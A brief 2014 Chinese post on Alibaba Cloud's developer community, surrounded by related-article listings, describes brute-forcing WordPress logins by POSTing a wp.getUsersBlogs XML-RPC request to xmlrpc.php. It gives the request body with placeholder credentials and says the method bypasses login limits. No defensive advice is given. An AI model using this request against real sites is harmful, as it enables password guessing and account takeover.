备案控制台
开发者社区 开发与运维 文章 正文

利用xmlrpc.php对WordPress进行暴力破解攻击

2014-07-28 1171
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc. 
这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc.php.
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
   <param><value>username</value></param>
   <param><value>password</value></param>
  </params>
</methodCall>
文章标签:
PHP
关键词:
PHP wordpress
wordpress攻击
PHP暴力破解
cnbird
目录
相关文章
米码收割机
|
1天前
|
人工智能 搜索推荐 安全
【wordPress】WordPress删除index.php后缀【亲测有效】(手把手教学)
【wordPress】WordPress删除index.php后缀【亲测有效】(手把手教学)
米码收割机
17 0
北京六翼开源
|
监控 安全 Ubuntu
重视WordPress建站安全性,WordPress定制开发如何发挥其安全性不被攻击
WordPress网站上每分钟有超过90,978次攻击,尽管这个数字听起来很大,但如果您遵循基本的安全规则,则可以防止大多数潜在攻击并使您的网站免受攻击。或者至少让它很难闯入,以至于黑客宁愿瞄准数千个安全性差的人之一。这并不难做到,特别是如果您考虑到许多攻击是在自动漏洞扫描程序找到潜在途径后执行的。那么,如何飙升WordPress网站安全性?WordPress定制开发如何发挥其安全性不被攻击? 北京六翼信息技术有限公司的开发工程师给出以下是 6 个基本提示重视WordPress建站安全性的建议。
北京六翼开源
120 0
重视WordPress建站安全性,WordPress定制开发如何发挥其安全性不被攻击
北京六翼开源
|
关系型数据库 MySQL API
如何修复“PHP 安装缺少 WordPress 所需的 MySQL 扩展”的错误?
在WordPress建站,WordPress定制开发过程中,开发者容易遇见“您的 PHP 安装似乎缺少 WordPress 所需的 MySQL 扩展”的错误提示,如果出现这样的情况,应该怎么办?北京六翼信息有限公司的开发工程师指出,要修复错误“您的 PHP 安装似乎缺少 WordPress 所需的 MySQL 扩展”,您需要确保您的 PHP 安装已正确安装和配置 MySQL 数据库驱动程序 (mysqlnd) 和 mysqli 扩展。只有这样,您才能恢复 WordPress 和 WordPress 数据库之间的正常连接,并让您的网站重新运行。
北京六翼开源
374 0
如何修复“PHP 安装缺少 WordPress 所需的 MySQL 扩展”的错误?
码农工程师
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
码农工程师
174 0
蛮三刀酱
|
消息中间件 监控 网络协议
SaltStack安装Apache/Mysql/PHP部署Wordpress
SaltStack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。 SaltStack 采用 C/S模式,server端就是salt的master,client端就是minion,minion与master之间通过ZeroMQ消息队列通信。 master监听4505和4506端口,4505对应的是ZMQ的PUB system,用来发送消息,4506对应的是REP system是来接受
蛮三刀酱
153 0
修古
|
应用服务中间件 PHP Apache
wordpress轻量应用服务器升级php版本
轻量应用服务器wordpress镜像默认使用php5.6版本,wordpress使用4.8.1。但是近期wordpress更新了版本,要求PHP版本不低于7.3,导致无法正常使用新版本wordpress,本文介绍如何手动编译更新PHP到7.3。
修古
18179 3
needrunning
|
存储 安全 PHP
PHP学习 wordpress中的 get_option()
以下为转载 http://www.wordpress.la/codex-%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0-get_option().html 说明 这是一种从选项数据库表wp_options中获取有名称的选项的值的安全方法。
needrunning
1021 0
外贸狗
|
关系型数据库 测试技术 PHP
零基础搭建PHP本地环境并安装WordPress网站(图文指导)
搭建PHP本地环境前言 以前在大学课堂上学过一点JAVA, PHP. 因为那时是零基础,需要自己搭建APACH, MYSQL, PHPADMIN过程挺烦的,本地环境都不知道是啥,但是做出来结果却很高兴。
外贸狗
4405 0
觉宇
|
安全 开发者 Windows
金融安全资讯精选 2018年第三期:上海P2P备案大考来临,新型KillDisk变种攻击拉丁美洲金融机构,WordPress 发布安全更新版本,如何在阿里云环境下搭建基于SonarQube的自动化安全代码检测平台
新型KillDisk变种攻击拉丁美洲金融机构,WordPress 发布安全更新版本,如何在阿里云环境下搭建基于SonarQube的自动化安全代码检测平台
觉宇
2105 0
科技小能手
|
测试技术 程序员 PHP
烂泥:Wordpress添加PHP测试页到网站根目录
科技小能手
1211 0

热门文章

最新文章

  • 1
    WP-AutoPostPro WordPress自动采集发布插件
  • 2
    Serverless 应用引擎产品使用之在阿里函数计算中,Php环境,配置取消禁止函数exec如何解决
  • 3
    使用PHP实现动态代理IP的功能
  • 4
    Serverless 应用引擎操作报错合集之在阿里函数计算中,云函数怎么一直报错Function instance exited unexpectedly(code 1, message:operation not permitted) with start command 'php server.php '.如何解决
  • 5
    记录如何用php做一个网站访问计数器的方法
  • 6
    【PHP开发专栏】Xdebug在PHP调试中的应用
  • 7
    【PHP开发专栏】PHP事务处理与并发控制
  • 8
    【PHP开发专栏】PHP类的继承与多态实现
  • 9
    PHP 8.1版本发布:引领Web开发新潮流
  • 10
    2024一分钱网淘客联盟PHP网站源码
  • 1
    深入PHP内核:探索高性能异步编程
    23
  • 2
    阿里云OpenAPI RocketMQ 5.0的PHP收发消息文档
    61
  • 3
    PHP爬虫技术:利用simple_html_dom库分析汽车之家电动车参数
    31
  • 4
    深入理解PHP的命名空间和自动加载机制
    16
  • 5
    深入理解PHP中的命名空间和自动加载机制
    29
  • 6
    深入理解PHP的命名空间和自动加载机制
    31
  • 7
    PHP运算符
    22
  • 8
    PHP变量类型
    18
  • 9
    PHP对象和类
    22
  • 10
    PHP注释
    14

    • 相关课程

    更多
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
  • PHP完全自学手册文档教程

    • 相关电子书

    更多
  • 阿里云栖开发者沙龙PHP技术专场-深入浅出网络编程与swoole内核-吴镇宇
  • PHP安全开发:从白帽角度做安全
  • PHP 2017.北京 全球开发者大会——高可用的PHP

    • 相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
  • 10分钟Serverless部署PHP商城
  • 通过Helm CLI部署wordpress到ACK集群
  • 手动搭建FTP站点(CentOS 8)
  • 手动搭建WordPress(CentOS 8)
  • 手动搭建FTP站点(CentOS 7)
    • 下一篇
    2024年阿里云免费云服务器及学生云服务器申请教程参考